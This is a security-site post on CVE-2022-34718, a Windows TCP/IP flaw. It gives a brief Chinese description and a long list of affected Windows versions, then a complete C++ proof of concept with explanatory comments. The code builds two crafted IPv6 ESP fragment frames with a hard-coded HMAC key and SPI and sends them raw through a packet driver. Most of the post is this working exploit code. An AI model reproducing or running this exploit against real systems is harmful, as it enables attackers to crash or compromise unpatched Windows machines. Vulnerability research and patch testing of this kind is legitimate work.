【CVE-2022-34718】Microsoft Windows TCP/IP component 安全漏洞POC
作者:Sec-Labs | 发布时间:
漏洞简介
Microsoft Windows TCP/IP component是美国微软(Microsoft)公司的一个为Windows提供TCP/IP配置功能的组件。
Microsoft Windows TCP/IP存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems,Windows 10 for 32-bit Systems,Windows 10 for x64-based Systems,Windows 10 Version 1607 for 32-bit Systems,Windows 10 Version 1607 for x64-based Systems,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation),Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows 7 for 32-bit Systems Service Pack 1,Windows 7 for x64-based Systems Service Pack 1,Windows 8.1 for 32-bit systems,Windows 8.1 for x64-based systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 21H1 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows RT 8.1,Windows Server 2008 for 32-bit Systems Service Pack 2。
POC
poc.cpp
////////////////////////////////////////////////
// ScannerDemo.cpp文件
#include "../common/initsock.h"
#include <windows.h>
#include <stdio.h>
#include "ntddndis.h"
#include "protoutils.h"
#include "ProtoPacket.h"
#include <Stdint.h>
#include "Iphlpapi.h"
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#include "../common/comm.h"
// Forward declarations. SendThread is declared here but not defined
// anywhere on this page; GetGlobalData is defined below.
DWORD WINAPI SendThread(LPVOID lpParam);
BOOL GetGlobalData();
// Local adapter facts filled in by GetGlobalData(). Nothing in main() on
// this page reads them: the frames main() sends carry hard-coded addresses.
u_char g_ucLocalMac[6];
DWORD g_dwGatewayIP;
DWORD g_dwLocalIP;
DWORD g_dwMask;
// Winsock initialisation object from ../common/initsock.h (presumably an
// RAII wrapper around WSAStartup/WSACleanup -- not visible here).
CInitSock theSock;
// CNG AES state: declared but never referenced on this page.
BCRYPT_ALG_HANDLE m_hAesAlg;
BCRYPT_KEY_HANDLE m_hKey;
PBYTE m_pbKeyObject;
PBYTE m_pbIV;
// CNG hash state used by SHA1(): opened there and never closed or freed.
BCRYPT_HASH_HANDLE m_hHash;
PBYTE m_pbHashObject;
BCRYPT_ALG_HANDLE m_hHashAlg;
// 20-byte (0x14) output buffer of the last SHA1() call; main() copies its
// first 12 bytes into each frame.
BYTE rgbHash[0x14];
// 20-byte secret passed to BCryptCreateHash() as the HMAC key.
UCHAR str_SHA1_key[] =
"\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90";
// ESP SPI, already in network byte order; memcpy'd into both frames by main().
UINT32 spi = htonl(0x861b157c);
// Computes HMAC-SHA1 over len bytes at str_data, keyed with the global
// str_SHA1_key, and leaves the 20-byte result in the global rgbHash.
// The flag value 8 passed to BCryptOpenAlgorithmProvider is
// BCRYPT_ALG_HANDLE_HMAC_FLAG, so despite the name this is a keyed MAC,
// not a plain digest.
//   str_data - input bytes to authenticate
//   len      - number of input bytes
// NOTE(review): no NTSTATUS result is checked, the object buffer from
// malloc() is never freed, and neither m_hHash nor m_hHashAlg is ever
// destroyed/closed, so every call leaks (main() calls this twice).
void SHA1(PUCHAR str_data, DWORD len)
{
// hKey, temp and cbData are never used.
BCRYPT_KEY_HANDLE hKey = NULL;
DWORD cbHashObject, cbResult, temp = 0;
DWORD cbData = 0;
// Open SHA-1 in HMAC mode (flag 8 = BCRYPT_ALG_HANDLE_HMAC_FLAG).
BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);
// Determine the size of the Hash object
BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);
// Backing store for the hash object; malloc() result is not NULL-checked.
m_pbHashObject = (PBYTE)malloc(cbHashObject);
// Create the Hash object, supplying the 20-byte (0x14) key as the HMAC secret
BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);
// Hash the data
BCryptHashData(m_hHash, (PBYTE)str_data, len, 0);
// Finish the hash: writes 20 bytes into the global rgbHash
BCryptFinishHash(m_hHash, rgbHash, 0x14, 0);
return ;
}
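// Fills the globals g_ucLocalMac, g_dwGatewayIP, g_dwLocalIP and g_dwMask
// from the first adapter reported by GetAdaptersInfo().
// Returns TRUE when the globals were written, FALSE when the size query,
// the allocation or the second GetAdaptersInfo() call fails. (The earlier
// version returned TRUE unconditionally and would have passed a NULL
// buffer on allocation failure; main() ignores the result either way.)
BOOL GetGlobalData()
{
    ULONG ulLen = 0;
    // First call with a NULL buffer only reports the required size;
    // the documented result for that case is ERROR_BUFFER_OVERFLOW.
    if (::GetAdaptersInfo(NULL, &ulLen) != ERROR_BUFFER_OVERFLOW || ulLen == 0)
    {
        return FALSE;
    }
    PIP_ADAPTER_INFO pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);
    if (pAdapterInfo == NULL)
    {
        return FALSE;   // allocation failed: nothing to free
    }
    BOOL bOk = FALSE;
    if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)
    {
        // Only the first adapter in the linked list is used.
        memcpy(g_ucLocalMac, pAdapterInfo->Address, 6);
        g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
        g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);
        g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
        bOk = TRUE;
    }
    ::GlobalFree(pAdapterInfo);
    return bOk;
}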
// Entry point: starts the packet driver service, opens the first enumerated
// adapter, patches the SPI and a truncated HMAC-SHA1 trailer into two
// hard-coded IPv6/ESP Ethernet frames, sends them raw, and stops the service.
// Returns 0 on success, -1 when a driver/adapter step fails.
int main()
{
// Result ignored; the globals it fills are not used anywhere below.
GetGlobalData();
if (!ProtoStartService())
{
printf(" ProtoStartService() failed %d \n", ::GetLastError());
return -1;
}
// NOTE(review): hControlDevice is never closed on any path below -- confirm
// whether the Proto* API (not visible on this page) expects an explicit close.
HANDLE hControlDevice = ProtoOpenControlDevice();
if (hControlDevice == INVALID_HANDLE_VALUE)
{
printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError());
ProtoStopService();
return -1;
}
CPROTOAdapters adapters;
if (!adapters.EnumAdapters(hControlDevice))
{
printf(" Enume adapter failed \n");
ProtoStopService();
return -1;
}
// Only the first enumerated adapter is opened.
CAdapter adapter;
if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))
{
printf(" OpenAdapter failed \n");
ProtoStopService();
return -1;
}
// Receive filter (result not checked); promiscuous mode is left commented out.
adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS|
NDIS_PACKET_TYPE_DIRECTED |
NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);
// Two raw Ethernet frames with identical layout: 14-byte Ethernet header
// (hard-coded MACs, EtherType 0x86dd = IPv6), 40-byte IPv6 header
// (payload length 0x38, next header 0x32 = ESP, hard-coded link-local
// addresses), then the ESP header at byte offset 0x36 (54). The final 12
// bytes of 0x41 are a placeholder that is overwritten with the MAC below.
// The frames differ in the ESP sequence number (0x21 vs 0x22) and in a few
// bytes of the ESP payload.
UCHAR ipv6_ESP_Fragment_1[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq
"\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
UCHAR ipv6_ESP_Fragment_2[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq
"\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
// Fix-ups, identical for both frames: write the SPI over the 4 placeholder
// bytes at 0x36, run the keyed hash over the 0x2c (44) bytes from the SPI
// through the ESP tail, and copy the first 0x0c (12) bytes of the 20-byte
// result over the placeholder at 0x62 -- i.e. a 96-bit truncated ICV.
memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);
memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);
// sizeof()-1 drops the string literal's NUL terminator (110 bytes each).
// SendData results are not checked.
adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);
adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);
ProtoStopService();
return 0;
}